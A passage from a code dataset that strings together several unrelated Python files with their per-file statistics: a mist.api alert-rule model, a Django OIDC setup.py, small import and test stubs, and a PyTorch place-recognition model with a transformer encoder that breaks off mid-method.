def extract_function(file_path, criterion):
with open(file_path, 'r') as f:
return extract_function_from_text(f.read(), criterion)
| 33.714286
| 121
| 0.59776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 305
| 0.092312
|
428caa0f2af4107e3b019feaf07304cc2bf7796d
| 17,226
|
py
|
Python
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 6
|
2017-08-24T00:34:30.000Z
|
2022-01-16T21:29:22.000Z
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 9
|
2021-03-31T18:50:47.000Z
|
2022-01-09T23:20:02.000Z
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 13
|
2017-09-21T18:17:02.000Z
|
2022-02-21T04:29:25.000Z
|
import uuid
import mongoengine as me
from mist.api import config
from mist.api.exceptions import BadRequestError
from mist.api.users.models import Organization
from mist.api.selectors.models import SelectorClassMixin
from mist.api.rules.base import NoDataRuleController
from mist.api.rules.base import ResourceRuleController
from mist.api.rules.base import ArbitraryRuleController
from mist.api.rules.models import RuleState
from mist.api.rules.models import Window
from mist.api.rules.models import Frequency
from mist.api.rules.models import TriggerOffset
from mist.api.rules.models import QueryCondition
from mist.api.rules.models import BaseAlertAction
from mist.api.rules.models import NotificationAction
from mist.api.rules.plugins import GraphiteNoDataPlugin
from mist.api.rules.plugins import GraphiteBackendPlugin
from mist.api.rules.plugins import InfluxDBNoDataPlugin
from mist.api.rules.plugins import InfluxDBBackendPlugin
from mist.api.rules.plugins import ElasticSearchBackendPlugin
from mist.api.rules.plugins import FoundationDBNoDataPlugin
from mist.api.rules.plugins import FoundationDBBackendPlugin
from mist.api.rules.plugins import VictoriaMetricsNoDataPlugin
from mist.api.rules.plugins import VictoriaMetricsBackendPlugin
class Rule(me.Document):
"""The base Rule mongoengine model.
The Rule class defines the base schema of all rule types. All documents of
any Rule subclass will be stored in the same mongo collection.
All Rule subclasses MUST define a `_controller_cls` class attribute and a
backend plugin. Controllers are used to perform actions on instances of
Rule, such as adding or updating. Backend plugins are used to transform a
Rule into the corresponding query to be executed against a certain data
storage. Different types of rules, such as a rule on monitoring metrics or
a rule on logging data, should also define and utilize their respective
backend plugins. For instance, a rule on monitoring data, which is stored
in a TSDB like Graphite, will have to utilize a different plugin than a
rule on logging data, stored in Elasticsearch, in order to successfully
query the database.
The Rule class is mainly divided into two categories:
1. Arbitrary rules - defined entirely by the user. This type of rules gives
users the freedom to execute arbitrary queries on arbitrary data. The query
may include (nested) expressions and aggregations on arbitrary fields whose
result will be evaluated against a threshold based on a comparison operator
(=, <, etc).
2. Resource rules - defined by using Mist.io UUIDs and tags. This type of
rules can be used to easily setup alerts on resources given their tags or
UUIDs. In this case, users have to explicitly specify the target metric's
name, aggregation function, and resources either by their UUIDs or tags.
This type of rules allows for easier alert configuration on known resources
in the expense of less elastic query expressions.
The Rule base class can be used to query the database and fetch documents
created by any Rule subclass. However, in order to add new rules one must
use one of the Rule subclasses, which represent different rule type, each
associated with the corresponding backend plugin.
"""
id = me.StringField(primary_key=True, default=lambda: uuid.uuid4().hex)
title = me.StringField(required=True)
owner_id = me.StringField(required=True)
# Specifies a list of queries to be evaluated. Results will be logically
# ANDed together in order to decide whether an alert should be raised.
queries = me.EmbeddedDocumentListField(QueryCondition, required=True)
# Defines the time window and frequency of each search.
window = me.EmbeddedDocumentField(Window, required=True)
frequency = me.EmbeddedDocumentField(Frequency, required=True)
# Associates a reminder offset, which will cause an alert to be fired if
# and only if the threshold is exceeded for a number of trigger_after
# intervals.
trigger_after = me.EmbeddedDocumentField(
TriggerOffset, default=lambda: TriggerOffset(period='minutes')
)
# Defines a list of actions to be executed once the rule is triggered.
# Defaults to just notifying the users.
actions = me.EmbeddedDocumentListField(
BaseAlertAction, required=True, default=lambda: [NotificationAction()]
)
# Disable the rule organization-wide.
disabled = me.BooleanField(default=False)
# Fields passed to scheduler as optional arguments.
queue = me.StringField()
exchange = me.StringField()
routing_key = me.StringField()
# Fields updated by the scheduler.
last_run_at = me.DateTimeField()
run_immediately = me.BooleanField()
total_run_count = me.IntField(min_value=0, default=0)
total_check_count = me.IntField(min_value=0, default=0)
# Field updated by dramatiq workers. This is where workers keep state.
states = me.MapField(field=me.EmbeddedDocumentField(RuleState))
meta = {
'strict': False,
'collection': 'rules',
'allow_inheritance': True,
'indexes': [
'owner_id',
{
'fields': ['owner_id', 'title'],
'sparse': False,
'unique': True,
'cls': False,
}
]
}
_controller_cls = None
_backend_plugin = None
_data_type_str = None
def __init__(self, *args, **kwargs):
super(Rule, self).__init__(*args, **kwargs)
if self._controller_cls is None:
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update alert rules and actions. Use a "
"subclass of self that defines a `_controller_cls` class "
"attribute derived from `mist.api.rules.base:BaseController`, "
"instead." % self.__class__.__name__
)
if self._backend_plugin is None:
raise NotImplementedError(
"Cannot instantiate self. %s does not define a backend_plugin "
"in order to evaluate rules against the corresponding backend "
"storage." % self.__class__.__name__
)
if self._data_type_str not in ('metrics', 'logs', ):
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update rules. Use a subclass of self that "
"defines a `_backend_plugin` class attribute, as well as the "
"requested data's type via the `_data_type_str` attribute, "
"instead." % self.__class__.__name__
)
self.ctl = self._controller_cls(self)
@classmethod
def add(cls, auth_context, title=None, **kwargs):
"""Add a new Rule.
New rules should be added by invoking this class method on a Rule
subclass.
Arguments:
owner: instance of mist.api.users.models.Organization
title: the name of the rule. This must be unique per Organization
kwargs: additional keyword arguments that will be passed to the
corresponding controller in order to setup the self
"""
try:
cls.objects.get(owner_id=auth_context.owner.id, title=title)
except cls.DoesNotExist:
rule = cls(owner_id=auth_context.owner.id, title=title)
rule.ctl.set_auth_context(auth_context)
rule.ctl.add(**kwargs)
else:
raise BadRequestError('Title "%s" is already in use' % title)
return rule
@property
def owner(self):
"""Return the Organization (instance) owning self.
We refrain from storing the owner as a me.ReferenceField in order to
avoid automatic/unwanted dereferencing.
"""
return Organization.objects.get(id=self.owner_id)
@property
def org(self):
"""Return the Organization (instance) owning self.
"""
return self.owner
@property
def plugin(self):
"""Return the instance of a backend plugin.
Subclasses MUST define the plugin to be used, instantiated with `self`.
"""
return self._backend_plugin(self)
# NOTE The following properties are required by the scheduler.
@property
def name(self):
"""Return the name of the task.
"""
return 'Org(%s):Rule(%s)' % (self.owner_id, self.id)
@property
def task(self):
"""Return the dramatiq task to run.
This is the most basic dramatiq task that should be used for most rule
evaluations. However, subclasses may provide their own property or
class attribute based on their needs.
"""
return 'mist.api.rules.tasks.evaluate'
@property
def args(self):
"""Return the args of the dramatiq task."""
return (self.id, )
@property
def kwargs(self):
"""Return the kwargs of the dramatiq task."""
return {}
@property
def expires(self):
"""Return None to denote that self is not meant to expire."""
return None
@property
def enabled(self):
"""Return True if the dramatiq task is currently enabled.
Subclasses MAY override or extend this property.
"""
return not self.disabled
def is_arbitrary(self):
"""Return True if self is arbitrary.
Arbitrary rules lack a list of `selectors` that refer to resources
either by their UUIDs or by tags. Such a list makes it easy to setup
rules referencing specific resources without the need to provide the
raw query expression.
"""
return 'selectors' not in type(self)._fields
def clean(self):
# FIXME This is needed in order to ensure rule name convention remains
# backwards compatible with the old monitoring stack. However, it will
# have to change in the future due to uniqueness constrains.
if not self.title:
self.title = 'rule%d' % self.owner.rule_counter
def as_dict(self):
return {
'id': self.id,
'title': self.title,
'queries': [query.as_dict() for query in self.queries],
'window': self.window.as_dict(),
'frequency': self.frequency.as_dict(),
'trigger_after': self.trigger_after.as_dict(),
'actions': [action.as_dict() for action in self.actions],
'disabled': self.disabled,
'data_type': self._data_type_str,
}
def __str__(self):
return '%s %s of %s' % (self.__class__.__name__,
self.title, self.owner)
class ArbitraryRule(Rule):
"""A rule defined by a single, arbitrary query string.
Arbitrary rules permit the definition of complex query expressions by
allowing users to define fully qualified queries in "raw mode" as a
single string. In such case, a query expression may be a composite query
that includes nested aggregations and/or additional queries.
An `ArbitraryRule` must define a single `QueryCondition`, whose `target`
defines the entire query expression as a single string.
"""
_controller_cls = ArbitraryRuleController
class ResourceRule(Rule, SelectorClassMixin):
"""A rule bound to a specific resource type.
Resource-bound rules are less elastic than arbitrary rules, but allow
users to perform quick, more dynamic filtering given a resource object's
UUID, tags, or model fields.
Every subclass of `ResourceRule` MUST define its `selector_resource_cls`
class attribute in order for queries to be executed against the intended
mongodb collection.
A `ResourceRule` may also apply to multiple resources, which depends on
the rule's list of `selectors`. By default such a rule will trigger an
alert if just one of its queries evaluates to True.
"""
_controller_cls = ResourceRuleController
@property
def enabled(self):
return (super(ResourceRule, self).enabled and
bool(self.get_resources().count()))
def clean(self):
# Enforce singular resource types for uniformity.
if self.resource_model_name.endswith('s'):
self.resource_model_name = self.resource_model_name[:-1]
super(ResourceRule, self).clean()
def as_dict(self):
d = super(ResourceRule, self).as_dict()
d['selectors'] = [cond.as_dict() for cond in self.selectors]
d['resource_type'] = self.resource_model_name
return d
# FIXME All following properties are for backwards compatibility.
@property
def metric(self):
assert len(self.queries) is 1
return self.queries[0].target
@property
def operator(self):
assert len(self.queries) is 1
return self.queries[0].operator
@property
def value(self):
assert len(self.queries) is 1
return self.queries[0].threshold
@property
def aggregate(self):
assert len(self.queries) is 1
return self.queries[0].aggregation
@property
def reminder_offset(self):
return self.frequency.timedelta.total_seconds() - 60
@property
def action(self):
for action in reversed(self.actions):
if action.atype == 'command':
return 'command'
if action.atype == 'machine_action':
return action.action
if action.atype == 'notification':
return 'alert'
class MachineMetricRule(ResourceRule):
_data_type_str = 'metrics'
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
return FoundationDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsBackendPlugin
raise Exception()
def clean(self):
super(MachineMetricRule, self).clean()
if self.resource_model_name != 'machine':
raise me.ValidationError(
'Invalid resource type "%s". %s can only operate on machines' %
(self.resource_model_name, self.__class__.__name__))
class NoDataRule(MachineMetricRule):
_controller_cls = NoDataRuleController
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
return FoundationDBNoDataPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-victoriametrics'):
return VictoriaMetricsNoDataPlugin
raise Exception()
# FIXME All following properties are for backwards compatibility.
# However, this rule is not meant to match any queries, but to be
# used internally, thus the `None`s.
@property
def metric(self):
return None
@property
def operator(self):
return None
@property
def value(self):
return None
@property
def aggregate(self):
return None
@property
def reminder_offset(self):
return None
@property
def action(self):
return ''
class ResourceLogsRule(ResourceRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
class ArbitraryLogsRule(ArbitraryRule):
_data_type_str = 'logs'
_backend_plugin = ElasticSearchBackendPlugin
def _populate_rules():
"""Populate RULES with mappings from rule type to rule subclass.
RULES is a mapping (dict) from rule types to subclasses of Rule.
A rule's type is the concat of two strings: <str1>-<str2>, where
str1 denotes whether the rule is arbitrary or not and str2 equals
the `_data_type_str` class attribute of the rule, which is simply
the type of the requesting data, like logs or monitoring metrics.
The aforementioned concatenation is simply a way to categorize a
rule, such as saying a rule on arbitrary logs or a resource-bound
rule referring to the monitoring data of machine A.
"""
public_rule_map = {}
hidden_rule_cls = (ArbitraryRule, ResourceRule, NoDataRule, )
for key, value in list(globals().items()):
if not key.endswith('Rule'):
continue
if value in hidden_rule_cls:
continue
if not issubclass(value, (ArbitraryRule, ResourceRule, )):
continue
str1 = 'resource' if issubclass(value, ResourceRule) else 'arbitrary'
rule_key = '%s-%s' % (str1, value._data_type_str)
public_rule_map[rule_key] = value
return public_rule_map
RULES = _populate_rules()
| 35.155102
| 79
| 0.673981
| 14,731
| 0.855161
| 0
| 0
| 4,875
| 0.283002
| 0
| 0
| 7,951
| 0.46157
|
428d613a4c439197af5e225dec64ebdd98da7d00
| 1,685
|
py
|
Python
|
setup.py
|
andrewwhitehead/django-oidc-rp
|
233f1daeef96dbe84ecbb37fa31393c84f9c2805
|
[
"MIT"
] | 20
|
2018-04-16T13:17:35.000Z
|
2021-06-05T00:08:33.000Z
|
setup.py
|
andrewwhitehead/django-oidc-rp
|
233f1daeef96dbe84ecbb37fa31393c84f9c2805
|
[
"MIT"
] | 9
|
2018-07-20T18:19:13.000Z
|
2021-12-22T08:57:18.000Z
|
setup.py
|
bcgov/django-oidc-rp
|
50e6fa143e61b04849b4c66beef078be0d7669de
|
[
"MIT"
] | 21
|
2018-07-10T16:05:44.000Z
|
2022-01-24T05:57:09.000Z
|
# -*- coding: utf-8 -*-
import codecs
from os.path import abspath
from os.path import dirname
from os.path import join
from setuptools import find_packages
from setuptools import setup
import oidc_rp
def read_relative_file(filename):
""" Returns contents of the given file, whose path is supposed relative to this module. """
with codecs.open(join(dirname(abspath(__file__)), filename), encoding='utf-8') as f:
return f.read()
setup(
name='django-oidc-rp',
version=oidc_rp.__version__,
author='impak Finance',
author_email='tech@impakfinance.com',
packages=find_packages(exclude=['tests.*', 'tests']),
include_package_data=True,
url='https://github.com/impak-finance/django-oidc-rp',
license='MIT',
description='A server side OpenID Connect Relying Party (RP/Client) implementation for Django.',
long_description=read_relative_file('README.rst'),
keywords='django openidconnect oidc client rp authentication auth',
zip_safe=False,
install_requires=[
'django>=1.11',
'jsonfield2',
'pyjwkest>=1.4',
'requests>2.0',
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 31.792453
| 100
| 0.648071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.51276
|
428e0c3390f490eb7e09d675c22baad9bedb5ba6
| 171
|
py
|
Python
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 242
|
2021-05-17T12:31:39.000Z
|
2022-03-31T11:51:29.000Z
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 59
|
2021-06-02T07:32:10.000Z
|
2022-03-31T18:45:52.000Z
|
nndet/evaluator/detection/__init__.py
|
joeranbosma/nnDetection
|
2ebbf1cdc8a8794c73e325f06fea50632c78ae8c
|
[
"BSD-3-Clause"
] | 38
|
2021-05-31T14:01:37.000Z
|
2022-03-21T08:24:40.000Z
|
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
| 42.75
| 62
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
428e40b791a018156767a64f9f6283399ebd2b1c
| 289
|
py
|
Python
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 39
|
2020-02-12T23:41:24.000Z
|
2022-02-28T15:46:23.000Z
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 9
|
2019-08-02T18:25:07.000Z
|
2022-02-07T23:14:43.000Z
|
tests/test_update.py
|
sosie-js/ankisync2
|
a41580197eab7f180f02a38a4aa912eb54cfaa93
|
[
"MIT"
] | 6
|
2019-09-09T14:27:48.000Z
|
2021-08-31T08:13:00.000Z
|
# from ankisync2.apkg import Apkg, db
# Has to be done through normal database methods
# def test_update():
# apkg = Apkg("example1.apkg")
# for n in db.Notes.filter(db.Notes.data["field1"] == "data1"):
# n.data["field3"] = "data2"
# n.save()
# apkg.close()
| 24.083333
| 67
| 0.598616
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.961938
|
428eac96b1905cf94fc5b1f167e60c8c46762f48
| 16,931
|
py
|
Python
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 3
|
2021-04-28T07:19:39.000Z
|
2022-03-07T09:34:19.000Z
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 18
|
2020-08-24T12:40:38.000Z
|
2022-03-12T00:47:14.000Z
|
lib/place_model.py
|
ihaeyong/drama-graph
|
60c3c216cd74bb19efd6baf836f6c7c2b42b764f
|
[
"MIT"
] | 1
|
2020-10-15T10:09:20.000Z
|
2020-10-15T10:09:20.000Z
|
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
}
def label_mapping(target):
temp = []
for idx in range(len(target)):
if target[idx][0][:3] == 'con':
target[idx][0] = 'convenience store'
temp.append(label_dict[target[idx][0]])
return temp
def label_remapping(target):
inv_label_dict = {v: k for k, v in label_dict_wo_none.items()}
temp = []
for idx in range(len(target)):
temp.append(inv_label_dict[target[idx]])
return temp
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def place_buffer(images_norm, buffer_images):
if len(buffer_images) == 0:
buffer_images = images_norm
if len(buffer_images) < 10:
for idx in range(10-len(buffer_images)):
buffer_images = [images_norm[0]] + buffer_images
assert len(buffer_images) == 10, 'Buffer failed'
return buffer_images
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
sample_default = [105, 462, 953, 144, 108, 13, 123, 510, 1690, 19914, 1541, 126, 67, 592, 1010, 53, 2087, 0, 1547, 576, 74, 0]
def CB_loss(labels, logits, beta=0.99, gamma=0.5, samples_per_cls=sample_default, no_of_classes=22, loss_type='softmax'):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
labels: A int tensor of size [batch].
logits: A float tensor of size [batch, no_of_classes].
samples_per_cls: A python list of size [no_of_classes].
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
effective_num = 1.0 - np.power(beta, samples_per_cls)
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * no_of_classes
labels_one_hot = F.one_hot(labels, no_of_classes).cpu().float()
weights = torch.tensor(weights).float()
weights = weights.unsqueeze(0)
weights = weights.repeat(labels_one_hot.shape[0],1) * labels_one_hot
weights = weights.sum(1)
weights = weights.unsqueeze(1)
weights = weights.repeat(1,no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot.cuda(), logits, weights.cuda(), gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input = logits,target = labels_one_hot, weights = weights)
elif loss_type == "softmax":
pred = logits.softmax(dim = 1)
cb_loss = F.binary_cross_entropy(input = pred, target = labels_one_hot.cuda(), weight = weights.cuda())
return cb_loss
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input = logits, target = labels,reduction = "none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
class place_model(nn.Module):
def __init__(self, num_persons, num_faces, device):
super(place_model, self).__init__()
pre_model = Yolo(num_persons).cuda(device)
num_face_cls = num_faces
self.detector = YoloD(pre_model).cuda(device)
self.place_conv = nn.Sequential(nn.Conv2d(1024, 128, 3, 1, 1, bias=False), nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True), nn.MaxPool2d(2, 2))
self.avgpool = nn.AvgPool2d(7, stride=1)
# self.lstm_sc = torch.nn.LSTM(input_size=128, hidden_size=128, num_layers=2, batch_first=True)
# self.bert_fc1 = torch.nn.Linear(128, 768)
# self.bert_fc2 = torch.nn.Linear(768, 128)
self.bert = BERT()
self.fc2 = torch.nn.Linear(128, 1)
self.fc3 = torch.nn.Linear(128, 22)
self.softmax = torch.nn.Softmax(dim=1)
# # define face
# self.face_conv = nn.Conv2d(
# 1024, len(self.detector.anchors) * (5 + num_face_cls), 1, 1, 0, bias=False)
def forward(self, image):
N, T , C, H, W = image.size(0), image.size(1), image.size(2), image.size(3), image.size(4)
image = image.reshape(N*T, C, H, W)
# feature map of backbone
fmap, output_1 = self.detector(image)
fmap = self.place_conv(fmap)
x = self.avgpool(fmap)
x = x.reshape(N, T, -1)
# self.lstm_sc.flatten_parameters()
# N, T = x.size(0), x.size(1)
# x = self.lstm_sc(x)[0]
# x = self.bert_fc1(x)
x = self.bert(x)
# x = self.bert_fc2(x)
change = x.reshape(N*T, -1)
#x = self.fc1(x)
change = self.fc2(change)
change = change.reshape(N, T)
#x = x.reshape(N*T, -1)
M, _ = change.max(1)
w = change - M.view(-1,1)
w = w.exp()
w = w.unsqueeze(1).expand(-1,w.size(1),-1)
w = w.triu(1) - w.tril()
w = w.cumsum(2)
w = w - w.diagonal(dim1=1,dim2=2).unsqueeze(2)
ww = w.new_empty(w.size())
idx = M>=0
ww[idx] = w[idx] + M[idx].neg().exp().view(-1,1,1)
idx = ~idx
ww[idx] = M[idx].exp().view(-1,1,1)*w[idx] + 1
ww = (ww+1e-10).pow(-1)
ww = ww/ww.sum(1,True)
x = ww.transpose(1,2).bmm(x)
x = x.reshape(N*T, -1)
x = self.fc3(x)
x = x.reshape(N*T, -1)
return x
class BERT(nn.Module):
"""
BERT model : Bidirectional Encoder Representations from Transformers.
"""
def __init__(self, vocab_size=0, hidden=128, n_layers=5, attn_heads=8, dropout=0.):
"""
:param vocab_size: vocab_size of total words
:param hidden: BERT model hidden size
:param n_layers: numbers of Transformer blocks(layers)
:param attn_heads: number of attention heads
:param dropout: dropout rate
"""
super(BERT, self).__init__()
self.hidden = hidden
self.n_layers = n_layers
self.attn_heads = attn_heads
# paper noted they used 4*hidden_size for ff_network_hidden_size
self.feed_forward_hidden = hidden * 4
# embedding for BERT, sum of positional, segment, token embeddings
self.embedding = BERTEmbedding(vocab_size=vocab_size, embed_size=hidden)
# multi-layers transformer blocks, deep network
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden, attn_heads, hidden * 4, dropout) for _ in range(n_layers)])
def forward(self, x):
# attention masking for padded token
# torch.ByteTensor([batch_size, 1, seq_len, seq_len])
# mask = (x > 0).unsqueeze(1).repeat(1, x.size(1), 1).unsqueeze(1)
# embedding the indexed sequence to sequence of vectors
x = self.embedding(x)
# running over multiple transformer blocks
for transformer in self.transformer_blocks:
# x = transformer.forward(x, mask)
x = transformer.forward(x, None)
return x
class BERTEmbedding(nn.Module):
"""
BERT Embedding which is consisted with under features
1. TokenEmbedding : normal embedding matrix
2. PositionalEmbedding : adding positional information using sin, cos
2. SegmentEmbedding : adding sentence segment info, (sent_A:1, sent_B:2)
sum of all these features are output of BERTEmbedding
"""
def __init__(self, vocab_size, embed_size, dropout=0.):
"""
:param vocab_size: total vocab size
:param embed_size: embedding size of token embedding
:param dropout: dropout rate
"""
super(BERTEmbedding, self).__init__()
# self.token = TokenEmbedding(vocab_size=vocab_size, embed_size=embed_size)
# self.position = PositionalEmbedding(d_model=self.token.embedding_dim)
# self.segment = SegmentEmbedding(embed_size=self.token.embedding_dim)
self.position = PositionalEmbedding(d_model=embed_size)
self.dropout = nn.Dropout(p=dropout)
self.embed_size = embed_size
def forward(self, sequence):
# x = self.token(sequence) + self.position(sequence) + self.segment(segment_label)
x = sequence + self.position(sequence)
return self.dropout(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model, max_len=512):
super(PositionalEmbedding, self).__init__()
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model).float()
pe.require_grad = False
position = torch.arange(0, max_len).float().unsqueeze(1)
div_term = (torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model)).exp()
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
return self.pe[:, :x.size(1)]
class TransformerBlock(nn.Module):
"""
Bidirectional Encoder = Transformer (self-attention)
Transformer = MultiHead_Attention + Feed_Forward with sublayer connection
"""
def __init__(self, hidden, attn_heads, feed_forward_hidden, dropout):
"""
:param hidden: hidden size of transformer
:param attn_heads: head sizes of multi-head attention
:param feed_forward_hidden: feed_forward_hidden, usually 4*hidden_size
:param dropout: dropout rate
"""
super(TransformerBlock, self).__init__()
self.attention = MultiHeadedAttention(h=attn_heads, d_model=hidden)
self.feed_forward = PositionwiseFeedForward(d_model=hidden, d_ff=feed_forward_hidden, dropout=dropout)
self.input_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.output_sublayer = SublayerConnection(size=hidden, dropout=dropout)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, mask):
x = self.input_sublayer(x, lambda _x: self.attention.forward(_x, _x, _x, mask=mask))
x = self.output_sublayer(x, self.feed_forward)
return self.dropout(x)
class MultiHeadedAttention(nn.Module):
"""
Take in model size and number of heads.
"""
def __init__(self, h, d_model, dropout=0.1):
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.attention = Attention()
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
batch_size = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
